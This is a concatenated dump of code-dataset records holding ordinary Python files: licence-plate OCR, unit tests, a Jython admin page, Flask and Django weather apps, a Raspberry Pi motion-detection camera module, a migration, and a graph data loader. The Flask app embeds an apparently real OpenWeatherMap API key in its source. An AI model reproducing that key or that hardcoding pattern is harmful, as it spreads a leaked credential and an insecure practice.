(LPR)\\n\")\r\n print(\"SPZ auta:\",text)\r\n \"\"\"\r\n Zobrazení výsledného převodu textu z obrázku\r\n \"\"\"\r\n\r\n if not imgShow: return text\r\n \"\"\"\r\n Vrátí text spz kvuli zapisu do databaze\r\n \"\"\"\r\n\r\n img = cv2.resize(img,(500,300))\r\n Cropped = cv2.resize(Cropped,(400,200))\r\n \"\"\"\r\n Zvětšení oříznutého obrázku\r\n \"\"\"\r\n\r\n if(imgShow): cv2.imshow('original',img)\r\n \"\"\"\r\n Zobrazí originál\r\n \"\"\"\r\n\r\n if(imgShow): cv2.imshow('vysledek',Cropped)\t\r\n \"\"\"\r\n Zobrazí oříznutý výsledek\r\n \"\"\"\r\n\r\n cv2.waitKey(0)\r\n \"\"\"\r\n Neukončí program po dokončení operací\r\n \"\"\"\r\n\r\n cv2.destroyAllWindows()\r\n \"\"\"\r\n Zničí všechny okna\r\n \"\"\"\r\n\r\n\r\n##### Nápověda k nastavení #####\r\n\r\n\"\"\" TESSERACT nastaveni\r\ndef build_tesseract_options( psm=7):\r\n # tell Tesseract to only OCR alphanumeric characters\r\n alphanumeric = \"ABCDEFHIJKLMNPRSTUVXYZ0123456789\"\r\n options = \"-c tessedit_char_whitelist={}\".format(alphanumeric)\r\n # set the PSM mode\r\n options += \" --psm {}\".format(psm)\r\n # return the built options string\r\n return options\r\n\"\"\"\r\n\r\n\"\"\"\r\nmorphology - mozne vyuzit - krasne vykresluje kontrast\r\nrectKernel = cv2.getStructuringElement(cv2.MORPH_RECT, (13, 5)) ###cisla (13,5) meni toleranci ?\r\nblackhat = cv2.morphologyEx(gray, cv2.MORPH_BLACKHAT, rectKernel)\r\ncv2.imshow('BlackHat',blackhat) #kontorla\r\n\"\"\"\r\n","sub_path":"Projects/LPRRecognition/LPRrecognizationNUMPY/ver2/LPR.py","file_name":"LPR.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"318335805","text":"# Copyright 2015 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom pytest import fixture\nfrom solar.system_log import change\nfrom solar.system_log import data\nfrom solar.system_log import operations\nfrom solar.core.resource import resource\nfrom solar.interfaces import orm\n\n\ndef test_revert_update():\n commit = {'a': '10'}\n previous = {'a': '9'}\n res = orm.DBResource(id='test1', name='test1', base_path='x')\n res.save()\n res.add_input('a', 'str', '9')\n action = 'update'\n\n resource_obj = resource.load(res.name)\n\n assert resource_obj.args == previous\n\n log = data.SL()\n logitem =change.create_logitem(\n res.name, action, change.create_diff(commit, previous))\n log.append(logitem)\n resource_obj.update(commit)\n operations.move_to_commited(logitem.log_action)\n\n assert resource_obj.args == commit\n\n change.revert(logitem.uid)\n assert resource_obj.args == previous\n","sub_path":"solar/solar/test/test_system_log_api.py","file_name":"test_system_log_api.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"501658589","text":"import random\nimport unittest\nimport numpy as np\n\nfrom FCS_CPA import ball_in_bowl, Ymn_Leibniz_matAB, demo_Ymn_Leibniz, demo_Ymn_Binomial, Ymn_electron_zeroK\n\nhfe = lambda x,y: np.max(np.abs(x-y)/(np.abs(x)+np.abs(y)+1e-3))\nhfe_r5 = lambda x,y: round(hfe(x,y,),5)\n\n\nclass YmnUnittest(unittest.TestCase):\n\n def test_ball_in_bowl(self):\n def hf1(x0, x1):\n ret0 = []\n ret1 = []\n for y1,y2 in ball_in_bowl(x0, x1):\n ret0.append(y1)\n ret1.append(y2)\n return ret0, ret1\n tmp1,tmp2 = hf1(0, 3)\n self.assertEqual([], tmp1)\n self.assertEqual([], tmp2)\n\n tmp1,tmp2 = hf1(3, 1)\n self.assertEqual([(3,)], tmp1)\n self.assertEqual([(0,0,0,1)], tmp2)\n\n tmp1,tmp2 = hf1(3, 2)\n self.assertEqual([(0,3),(1,2),(2,1),(3,0)], tmp1)\n self.assertEqual([(1,0,0,1),(0,1,1,0),(0,1,1,0),(1,0,0,1)], tmp2)\n\n def test_Ymn_Leibniz_matAB(self):\n tmp1,tmp2 = Ymn_Leibniz_matAB(1, 1)\n self.assertTrue(hfe(np.array([1]), tmp1)<1e-7)\n self.assertEqual([[1,0]],tmp2.tolist())\n\n tmp1,tmp2 = Ymn_Leibniz_matAB(1, 2)\n self.assertTrue(hfe(np.array([1]), tmp1)<1e-7)\n self.assertEqual([[0,1]],tmp2.tolist())\n\n tmp1,tmp2 = Ymn_Leibniz_matAB(2, 4)\n self.assertTrue(hfe(np.array([6,8]), tmp1)<1e-7)\n self.assertEqual([[0,2],[2,0]],tmp2.tolist())\n\n def test_Ymn(self):\n fL = random.uniform(0, 1)\n fR = random.uniform(0, 1)\n for m in range(1, 7):\n for n in range(1, 7):\n tmp1 = demo_Ymn_Leibniz(m, n, fL, fR, 'electron')\n tmp2 = demo_Ymn_Binomial(m, n, fL, fR, 'electron')\n self.assertAlmostEqual(tmp1, tmp2)\n tmp1 = demo_Ymn_Leibniz(m, n, fL, fR, 'phonon')\n tmp2 = demo_Ymn_Binomial(m, n, fL, fR, 'phonon')\n self.assertAlmostEqual(tmp1, tmp2)\n\n def test_Ymn_electron_zeroK(self):\n ground_truth = [\n (1, [1]),\n (2, [1,2]),\n (3, [1,6,6]),\n (4, [1,14,36,24]),\n (5, [1,30,150,240,120]),\n ]\n for x,ret_ in ground_truth:\n ret = Ymn_electron_zeroK(x)\n for y1,y2 in zip(ret_,ret):\n self.assertAlmostEqual(y1, y2)\n","sub_path":"test_Ymn_coefficient.py","file_name":"test_Ymn_coefficient.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"206460566","text":"# coding=utf-8\r\nfrom base_action import *\r\nfrom user_query import UserQuery\r\nfrom article_query import ArticleQuery\r\nfrom resource_query import ResourceQuery\r\nfrom photo_query import PhotoQuery\r\nfrom group_query import GroupQuery\r\nfrom base_action import ActionResult\r\nfrom cn.edustar.jitar.pojos import User, Article, Resource, Photo, Group, AccessControl, TimerCount\r\nfrom cn.edustar.jitar.model import Configure\r\nfrom cn.edustar.jitar.util import CommonUtil\r\nfrom base_manage import *\r\n\r\n# 后台管理框架的页面.\r\nclass admin (BaseManage):\r\n # 定义要返回的页面常量.\r\n ADMIN_MAIN = \"/WEB-INF/ftl/admin/main.ftl\"\r\n \r\n def execute(self):\r\n # 验证用户必须具有管理权限.\r\n # 本页面的后台管理需要的权限有:系统管理员,系统用户管理员,系统内容管理员 \r\n\r\n canManage = False\r\n if self.isSystemAdmin():\r\n canManage = True\r\n request.setAttribute(\"isSystemAdmin\", \"1\")\r\n \r\n if self.isSystemUserAdmin():\r\n canManage = True\r\n request.setAttribute(\"isSystemUserAdmin\", \"1\")\r\n \r\n if self.isSystemContentAdmin():\r\n canManage = True\r\n request.setAttribute(\"isSystemContentAdmin\", \"1\") \r\n \r\n \r\n if canManage == False:\r\n self.addActionError(u\"没有管理权限,需要的权限为系统管理员、系统用户管理员和系统内容管理员.\")\r\n return ActionResult.ERROR\r\n \r\n cmd = request.getParameter(\"cmd\")\r\n if cmd == \"menu\":\r\n autoHtml = __jitar__.configService.getConfigure().getBoolValue(Configure.SITE_AUTO_HTML, True)\r\n request.setAttribute(\"autoHtml\", autoHtml) \r\n plugin_svc = __spring__.getBean(\"pluginService\")\r\n plugin_list = plugin_svc.getPluginList()\r\n request.setAttribute(\"plugin_list\", plugin_list)\r\n # 判断是否有频道可以管理\r\n channelPageService = __spring__.getBean(\"channelPageService\")\r\n hasChennels = channelPageService.getChannelList() \r\n request.setAttribute(\"hasChennels\", hasChennels)\r\n webSiteManageService = __spring__.getBean(\"webSiteManageService\")\r\n bklist = webSiteManageService.getBackYearList(\"article\")\r\n if bklist != None and len(bklist) > 0:\r\n request.setAttribute(\"bklist\", bklist)\r\n \r\n jitarColumnService = __spring__.getBean(\"jitarColumnService\")\r\n columnlist = jitarColumnService.getJitarColumnList()\r\n if columnlist != None and len(columnlist) > 0:\r\n request.setAttribute(\"columnlist\", columnlist)\r\n userService = __jitar__.userService\r\n userTypeList = userService.getAllUserType()\r\n if userTypeList != None and len(userTypeList) > 0:\r\n request.setAttribute(\"userTypeList\", userTypeList)\r\n return \"/WEB-INF/ftl/admin/menu.ftl\"\r\n elif cmd == \"main\":\r\n return self.main()\r\n else:\r\n url = self.params.getStringParam(\"url\")\r\n if url == None or url == \"\": url = \"?cmd=main\"\r\n request.setAttribute(\"url\", url)\r\n return \"/WEB-INF/ftl/admin/index.ftl\"\r\n\r\n\r\n # 后台管理的统计数据\r\n def main(self):\r\n request.setAttribute(\"site_stat\", __spring__.getBean(\"timerCountService\").getTimerCountById(TimerCount.COUNT_TYPE_SITE))\r\n return self.ADMIN_MAIN\r\n","sub_path":"WebContent/manage/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"465731285","text":"import requests\nfrom flask import Flask, render_template, request\nimport urllib\n\napp = Flask(__name__)\n\n# Defined these variables outside of the home function so I can use them globally within the function\nname = ''\ndescription = ''\ntemp = ''\nwind = '' \nicon = ''\n\n# Routes for web pages\n@app.route('/', methods=['POST', 'GET'])\ndef home():\n if request.method == 'POST':\n global name\n global description\n global temp\n global wind\n global icon\n\n city = request.form.get('city')\n \n try:\n #API call below, then formatting the response into json\n weather_key = '7113e7c022e4e898beaddbba87f4b835'\n url = 'https://api.openweathermap.org/data/2.5/weather'\n params = {'APPID': weather_key, 'q': city,'icon': icon, 'units': 'imperial'}\n response = requests.get(url, params=params)\n weather = response.json()\n\n # Weather information stored into variables and formatted into a string\n name = weather['name']\n description = weather['weather'][0]['description']\n temp = weather['main']['temp']\n wind = weather['wind']['speed']\n icon = weather['weather'][0]['icon']\n except:\n return 'ERROR, SOMETHING WENT WRONG, PLEASE ENTER A VALID CITY?'\n \n return render_template('layout.html', name=name, description=description, temp=temp, wind=wind, icon=icon)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"362562352","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom bs4 import BeautifulSoup as bs\nimport requests\n\n# Create your views here.\n\n@login_required(login_url=\"login\")\ndef weather(request):\n USER_AGENT = \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36\"\n # US english\n LANGUAGE = \"en-US,en;q=0.5\"\n session = requests.Session()\n session.headers['User-Agent'] = USER_AGENT\n session.headers['Accept-Language'] = LANGUAGE\n session.headers['Content-Language'] = LANGUAGE\n html = session.get(\"https://www.google.com/search?q=weather+kuala+lumpur\")\n # create a new soup\n soup = bs(html.text, \"html.parser\")\n # store all results on this dictionary\n result = {}\n # extract region\n result['region'] = soup.find(\"div\", attrs={\"id\": \"wob_loc\"}).text\n # extract temperature now\n result['temp_now'] = soup.find(\"span\", attrs={\"id\": \"wob_tm\"}).text\n # get the day and hour now\n result['dayhour'] = soup.find(\"div\", attrs={\"id\": \"wob_dts\"}).text\n # get the actual weather\n result['weather_now'] = soup.find(\"span\", attrs={\"id\": \"wob_dc\"}).text\n # get the precipitation\n result['precipitation'] = soup.find(\"span\", attrs={\"id\": \"wob_pp\"}).text\n # get the % of humidity\n result['humidity'] = soup.find(\"span\", attrs={\"id\": \"wob_hm\"}).text\n # extract the wind\n result['wind'] = soup.find(\"span\", attrs={\"id\": \"wob_ws\"}).text\n next_days = []\n days = soup.find(\"div\", attrs={\"id\": \"wob_dp\"})\n for day in days.findAll(\"div\", attrs={\"class\": \"wob_df\"}):\n # extract the name of the day\n day_name = day.find(\"div\", attrs={\"class\": \"QrNVmd Z1VzSb\"}).attrs['aria-label']\n # get weather status for that day\n weather = day.find(\"img\").attrs[\"alt\"]\n temp = day.findAll(\"span\", {\"class\": \"wob_t\"})\n # maximum temparature in Celsius, use temp[1].text if you want fahrenheit\n max_temp = temp[0].text\n # minimum temparature in Celsius, use temp[3].text if you want fahrenheit\n min_temp = temp[2].text\n next_days.append({\"name\": day_name, \"weather\": weather, \"max_temp\": max_temp, \"min_temp\": min_temp})\n # append to result\n result['next_days'] = next_days\n return render(request, 'weather/weather.html', {'nav':'weather','result':result})","sub_path":"travellerplan/weather/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"349324666","text":"import time\nimport numpy\nimport io\nimport os\nimport logging\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom threading import Thread\nfrom PIL import Image\n\nfrom camApp import app\nfrom camApp.camera.base_camera import BaseCamera\nfrom camApp.utils.helpers import get_float, get_int\n\ntry:\n import picamera\nexcept Exception:\n logging.root.warning('Error importing picamera, running Windows?')\n\n\nclass Camera(BaseCamera):\n movement_detection = False\n recording = False\n videos_seconds_duration = 300\n capturing_time_duration = 30\n captures_interval_time = 1\n nrmse_value_movement_detected = 0.980\n times_movement_detected_limit = 3\n resolution = (640, 480)\n iso_value = ''\n idle_timeout = 15\n event_thread_timeout = 30\n frame_rate = ''\n warmup_time = 2\n camera_captures_dir = os.path.join(app.config['BASE_DIR'], 'camApp', 'camera', 'captures')\n\n _movement_detected = False\n _frames_to_compare = [None, None]\n _movement_detection_count = 0\n _start_capturing_timestamp = 0\n _last_capture_timestamp = 0\n\n # Testing\n _test_nrmse_obatined_values = defaultdict(int)\n\n @staticmethod\n def frames():\n # Default res (720, 480), (1280, 720)\n resolution = Camera.resolution\n with picamera.PiCamera(resolution=resolution) as camera:\n # Available iso 100, 200, 320, 400, 500, 640, 800.\n if Camera.iso_value:\n camera.iso = Camera.iso_value\n\n # let camera warm up\n time.sleep(Camera.warmup_time)\n\n stream = io.BytesIO()\n for _ in camera.capture_continuous(stream, 'jpeg', use_video_port=False):\n stream.seek(0)\n\n yield stream.read()\n\n # reset stream for next frame\n stream.seek(0)\n stream.truncate()\n\n @staticmethod\n def detect_movement_and_capture():\n \"\"\"\n Start thread to detect movement and save frames into filesystem\n :return:\n \"\"\"\n Thread(target=Camera()._detect_movement_and_capture).start()\n\n @staticmethod\n def _detect_movement_and_capture():\n \"\"\"\n Get frames and compare them, if it detect movement store images from the camera to the filesystem\n :return:\n \"\"\"\n # Avoid multiple threads\n if not Camera.movement_detection:\n Camera.movement_detection = True\n\n # Get init frames\n Camera._frames_to_compare[0] = Camera.get_frame()\n Camera._frames_to_compare[1] = Camera.get_frame()\n\n # Variable used to stop the movement detection\n while Camera.movement_detection:\n compare_result = Camera.nrmse_compare(Camera._frames_to_compare[0], Camera._frames_to_compare[1])\n if compare_result < Camera.nrmse_value_movement_detected:\n Camera._movement_detection_count += 1\n logging.root.info('Movement detected {} - count {}'.format(str(compare_result),\n str(Camera._movement_detection_count)))\n\n # Testing\n Camera._test_nrmse_obatined_values[compare_result.round(3)] += 1\n else:\n Camera._movement_detection_count = 0\n Camera._frames_to_compare[0] = Camera._frames_to_compare[1]\n Camera._frames_to_compare[1] = Camera.get_frame()\n\n Camera.activate_capture()\n\n if Camera._movement_detected:\n Camera.store_image(Camera._frames_to_compare[0])\n\n @staticmethod\n def store_image(frame):\n \"\"\"\n Save the frame into the file system, we will store the images for capturing_time_duration seconds after\n detecting movement, if no movement have been detected we stop saving the images\n :param frame: Image as bytes\n :return:\n \"\"\"\n # Store 1 image every captures_interval_time to avoid to store to many images\n if time.time() - Camera._last_capture_timestamp > Camera.captures_interval_time:\n Camera._last_capture_timestamp = time.time()\n\n frame = Image.open(io.BytesIO(frame))\n timestamp = datetime.now().strftime('%y-%m-%d-%H-%M-%S-%f')\n file_path = os.path.join(Camera.camera_captures_dir, 'image_{}.jpg'.format(timestamp))\n frame.save(file_path, 'JPEG')\n\n # Validate if the time to save images has expired, if expired set the variable to False\n if time.time() - Camera._start_capturing_timestamp > Camera.capturing_time_duration:\n Camera._movement_detected = False\n logging.root.info('Stop capturing images')\n\n @staticmethod\n def activate_capture():\n \"\"\"\n Activate and init the variables used to save the images after detecting movement\n We save images if detect movement more than 3 times in a row, to avoid miss movement detections due to shadows\n :return:\n \"\"\"\n if Camera._movement_detection_count > Camera.times_movement_detected_limit:\n Camera._movement_detected = True\n Camera._start_capturing_timestamp = time.time()\n\n @staticmethod\n def nrmse_compare(frame_1, frame_2):\n \"\"\"\n Compare images using normalization of the root of the mean squared error\n We will consider movement if the result is <0.985\n :param frame_1: Image as bytes\n :param frame_2: Image as bytes\n :return: float, 1.0 Images equals, < 1.0 images difference\n \"\"\"\n frame_1 = Image.open(io.BytesIO(frame_1)).convert('L')\n frame_2 = Image.open(io.BytesIO(frame_2)).convert('L')\n\n if frame_1.size != frame_2.size:\n logging.root.error(\"Error: images size differ\")\n return 1.0\n\n for band1, band2 in zip(frame_1.split(), frame_2.split()):\n frame_1 = numpy.asarray(band1, dtype=numpy.double)\n frame_2 = numpy.asarray(band2, dtype=numpy.double)\n\n a, b = frame_1.shape\n rmse = numpy.sqrt(numpy.sum((frame_2 - frame_1) ** 2) / float(a * b))\n max_val = max(numpy.max(frame_1), numpy.max(frame_2))\n min_val = min(numpy.min(frame_1), numpy.min(frame_2))\n return 1 - (rmse / (max_val - min_val))\n\n @staticmethod\n def get_images_captured():\n \"\"\"\n Return a list of strings with all the name of the captured images\n :return: List of strings\n \"\"\"\n return os.listdir(Camera.camera_captures_dir)\n\n @staticmethod\n def remove_captures():\n \"\"\"\n Remove all the captures in the captures folder\n :return: List of removed paths\n \"\"\"\n removed = []\n try:\n files = os.listdir(Camera.camera_captures_dir)\n for file in files:\n path = os.path.join(Camera.camera_captures_dir, file)\n os.remove(path)\n removed.append(path)\n return removed\n except Exception as e:\n logging.root.error('Error removing captures {}'.format(str(e)))\n return removed\n\n @staticmethod\n def change_camera_config(config):\n \"\"\"\n Method to update the configurable parameters of the camera\n :param config: JSON with the configurable values\n :return:\n \"\"\"\n if 'capturing_time_duration' in config:\n value = get_float(config['capturing_time_duration'])\n if type(value) == float:\n Camera.capturing_time_duration = value\n if 'captures_interval_time' in config:\n value = get_float(config['captures_interval_time'])\n if type(value) == float:\n Camera.captures_interval_time = value\n if 'nrmse_value_movement_detected' in config:\n value = get_float(config['nrmse_value_movement_detected'])\n if type(value) == float:\n Camera.nrmse_value_movement_detected = value\n if 'times_movement_detected_limit' in config:\n value = get_float(config['times_movement_detected_limit'])\n if type(value) == float:\n Camera.times_movement_detected_limit = value\n if 'resolution' in config:\n value = get_int(config['resolution'][0])\n if type(value) == int:\n Camera.resolution = (value, Camera.resolution[1])\n value = get_int(config['resolution'][1])\n if type(value) == int:\n Camera.resolution = (Camera.resolution[0], value)\n if 'iso_value' in config:\n value = get_int(config['iso_value'])\n if type(value) == int:\n Camera.iso_value = value\n if 'idle_timeout' in config:\n value = get_int(config['idle_timeout'])\n if type(value) == int:\n BaseCamera.idle_timeout = value\n Camera.idle_timeout = value\n if 'frame_rate' in config:\n value = get_float(config['frame_rate'])\n if type(value) == float:\n Camera.frame_rate = value\n if 'warmup_time' in config:\n value = get_float(config['warmup_time'])\n if type(value) == float:\n Camera.warmup_time = value\n if 'event_thread_timeout' in config:\n value = get_int(config['event_thread_timeout'])\n if type(value) == int:\n Camera.event_thread_timeout = value\n BaseCamera.event_thread_timeout = value\n if 'videos_seconds_duration' in config:\n value = get_int(config['videos_seconds_duration'])\n if type(value) == int:\n Camera.videos_seconds_duration = value\n\n\nclass Recording(object):\n @staticmethod\n def record():\n Thread(target=Recording()._record).start()\n\n @staticmethod\n def _record():\n if not Camera.recording:\n Camera.recording = True\n resolution = Camera.resolution\n with picamera.PiCamera(resolution=resolution) as camera:\n # let camera warm up\n time.sleep(Camera.warmup_time)\n\n # Available iso 100, 200, 320, 400, 500, 640, 800.\n if Camera.iso_value:\n camera.iso = Camera.iso_value\n\n while Camera.recording:\n timestamp = datetime.now().strftime('%y-%m-%d-%H-%M-%S-%f')\n file_path = os.path.join(Camera.camera_captures_dir, 'video_{}.h264'.format(timestamp))\n\n camera.start_recording(file_path)\n camera.wait_recording(Camera.videos_seconds_duration)\n camera.stop_recording()\n\n # class Camera(Camera2):\n # \"\"\"\n # Fake Camera class to test outside Raspberry\n # \"\"\"\n # _aux_frames = []\n #\n # def __init__(self):\n # \"\"\"\n # Load images that will fake camera frames\n # \"\"\"\n # import cv2\n # import os\n # images_folder = os.path.join(os.path.dirname(__file__), '..', 'static', 'test_images')\n # aux_frames = []\n # for f in ['1', '2', '3']:\n # file_path = os.path.join(images_folder, f + '.jpg')\n # image = cv2.imread(file_path)\n # # encode image as jpeg\n # _, img_encoded = cv2.imencode('.jpg', image)\n # aux_frames.append(img_encoded.tostring())\n # Camera._aux_frames = aux_frames\n # Camera2.__init__(self)\n #\n # @staticmethod\n # def frames():\n # while True:\n # time.sleep(1)\n # yield Camera._aux_frames[int(time.time()) % 3]\n","sub_path":"camApp/camera/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":11753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"41984072","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport mptt.fields\nimport alex_coder.utils.autoslug_field\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, verbose_name='\\u0418\\u043c\\u044f')),\n ('email', models.EmailField(max_length=255, verbose_name='Email')),\n ('site', models.CharField(max_length=255, verbose_name='\\u0421\\u0430\\u0439\\u0442', blank=True)),\n ('text', models.TextField(verbose_name='\\u041a\\u043e\\u043c\\u043c\\u0435\\u043d\\u0442\\u0430\\u0440\\u0438\\u0439')),\n ('ip', models.GenericIPAddressField()),\n ('approved', models.BooleanField(default=True, verbose_name='\\u041e\\u0434\\u043e\\u0431\\u0440\\u0435\\u043d\\u043e')),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('lft', models.PositiveIntegerField(editable=False, db_index=True)),\n ('rght', models.PositiveIntegerField(editable=False, db_index=True)),\n ('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),\n ('level', models.PositiveIntegerField(editable=False, db_index=True)),\n ('parent', mptt.fields.TreeForeignKey(related_name='children', blank=True, to='blog.Comment', null=True)),\n ],\n options={\n 'ordering': ['created'],\n 'verbose_name': '\\u041a\\u043e\\u043c\\u043c\\u0435\\u043d\\u0442\\u0430\\u0440\\u0438\\u0439',\n 'verbose_name_plural': '\\u041a\\u043e\\u043c\\u043c\\u0435\\u043d\\u0442\\u0430\\u0440\\u0438\\u0438',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Post',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('slug', alex_coder.utils.autoslug_field.AutoSlugField(editable=False, populate_from=b'head_title', max_length=255, blank=True, unique=True)),\n ('text', models.TextField(blank=True)),\n ('publication_date', models.DateTimeField(null=True, blank=True)),\n ('meta_keywords', models.CharField(max_length=255, blank=True)),\n ('meta_description', models.CharField(max_length=255, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('modified', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'ordering': ['-publication_date'],\n 'verbose_name': '\\u041f\\u043e\\u0441\\u0442',\n 'verbose_name_plural': '\\u041f\\u043e\\u0441\\u0442\\u044b',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='comment',\n name='post',\n field=models.ForeignKey(to='blog.Post'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='comment',\n name='user',\n field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"alex_coder/blog/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"356809379","text":"from __future__ import generators, print_function\nimport numpy as np\nfrom random import shuffle\nfrom scipy.io import loadmat\n\nimport functools\nimport Queue\n#from multiprocessing import Process, Queue, Manager, Pool\nimport threading\nimport time\nfrom collections import defaultdict\n\n\ndef async_prefetch_wrapper(iterable, buffer=100):\n \"\"\"\n wraps an iterater such that it produces items in the background\n uses a bounded queue to limit memory consumption\n \"\"\"\n done = 'DONE'# object()\n\n def worker(q, it):\n for item in it:\n q.put(item)\n q.put(done)\n\n # launch a thread to fetch the items in the background\n queue = Queue.Queue(buffer)\n\n #pool = Pool()\n #m = Manager()\n #queue = m.Queue()\n it = iter(iterable)\n #workers = pool.apply_async(worker, (queue, it))\n thread = threading.Thread(target=worker, args=(queue, it))\n #thread = Process(target=worker, args=(queue, it))\n thread.daemon = True\n thread.start()\n # pull the items of the queue as requested\n while True:\n item = queue.get()\n if item == 'DONE':#done:\n return\n else:\n yield item\n\n #pool.close()\n #pool.join()\n\n\ndef async_prefetch(func):\n \"\"\"\n decorator to make generator functions fetch items in the background\n \"\"\"\n @functools.wraps(func)\n def wrapper(*args, **kwds):\n return async_prefetch_wrapper(func(*args, **kwds))\n\n return wrapper\n\nclass DataSet(object):\n def __init__(self, cfg):\n \"\"\"Construct a DataSet.\n \"\"\"\n self.cfg = cfg\n self.all_walks = np.fliplr(np.loadtxt(cfg.walks_dir, dtype=np.int)) # reverse the sequence\n self.node_seq = self.all_walks[:, -1] # index by ending node\n self.all_labels = self.get_labels(cfg.label_dir)\n self.all_features= self.get_fetaures(cfg.features_dir)\n\n #Increment the positions by 1 and mark the 0th one as False\n self.train_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'train_ids.npy')))\n self.val_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'val_ids.npy')))\n self.test_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'test_ids.npy')))\n # [!!!IMP!!]Assert no overlap between test/val/train nodes\n\n self.change = 0\n self.path_pred_variance = {}\n self.label_cache, self.update_cache = {0:self.all_labels[0]}, {}\n self.wce = self.get_wce()\n\n def get_fetaures(self, path):\n # Serves 2 purpose:\n # a) add feature for dummy node 0 a.k.a and \n # b) increments index of all features by 1, thus aligning it with indices in walks\n all_features = np.load(path)\n all_features = all_features.astype(np.float32, copy=False) # Required conversion for Python3\n all_features = np.concatenate(([np.zeros(all_features.shape[1])], all_features), 0)\n return all_features\n\n def get_labels(self, path):\n # Labels start with node '0'; Walks_data with node '1'\n # To get corresponding mapping, increment the label node number by 1\n # add label for dummy node 0 a.k.a and \n all_labels = np.load(path)\n all_labels = np.concatenate(([np.zeros(all_labels.shape[1])], all_labels), 0)\n\n return all_labels\n\n def get_wce(self):\n if self.cfg.solver.wce:\n valid = self.train_nodes + self.val_nodes\n tot = np.dot(valid, self.all_labels)\n wce = 1/(len(tot) * (tot*1.0/np.sum(tot)))\n else:\n wce = [1]*self.all_labels.shape[1]\n\n print(\"Cross-Entropy weights: \",wce)\n return wce\n\n\n def accumulate_label_cache(self, labels, nodes):\n #Aggregates all the labels for the corresponding nodes\n #and tracks the count of updates made\n default = (self.all_labels[0], 0) #Initial estimate -> all_zeros\n #WTF!labels = labels[0]\n \n if self.cfg.data_sets.binary_label_updates:\n #Convert to binary and keep only the maximum value as 1\n amax = np.argmax(labels, axis = 1)\n labels = np.zeros(labels.shape)\n for idx, pos in enumerate(amax):\n labels[idx,pos] = 1\n \n for idx, node in enumerate(nodes):\n prv_label, prv_count = self.update_cache.get(node, default)\n new_label = prv_label + labels[idx]\n new_count = prv_count + 1\n self.update_cache[node] = (new_label, new_count)\n\n def update_label_cache(self):\n #Average all the predictions made for the corresponding nodes and reset cache\n alpha = self.cfg.solver.label_update_rate\n\n update_no = len(self.path_pred_variance.items())\n self.path_pred_variance[update_no] = {}\n\n if len(self.label_cache.items()) <= 1: alpha =1\n\n for k, v in self.update_cache.items():\n old = self.label_cache.get(k, self.label_cache[0])\n cur = v[0]/v[1]\n new = (1-alpha)*old + alpha*cur\n self.change += np.mean((new - old) **2)\n self.path_pred_variance[update_no][k] = cur\n self.label_cache[k] = new\n\n print(\"\\nChange in label: :\", np.sqrt(self.change/self.cfg.data_sets._len_vocab)*100)\n self.change = 0\n self.update_cache = {}\n\n def get_nodes(self, dataset):\n nodes = []\n if dataset == 'train':\n nodes = self.train_nodes\n elif dataset == 'val':\n nodes = self.val_nodes\n elif dataset == 'test':\n nodes = self.test_nodes\n elif dataset == 'all':\n # Get all the nodes except the 0th node\n nodes = [True]*len(self.train_nodes)\n nodes[0] = False\n else:\n raise ValueError\n\n return nodes\n\n @async_prefetch\n def next_batch(self, dataset, batch_size, shuffle=True):\n\n nodes = self.get_nodes(dataset)\n label_len = np.shape(self.all_labels)[1]\n\n # Get position of all walks ending with 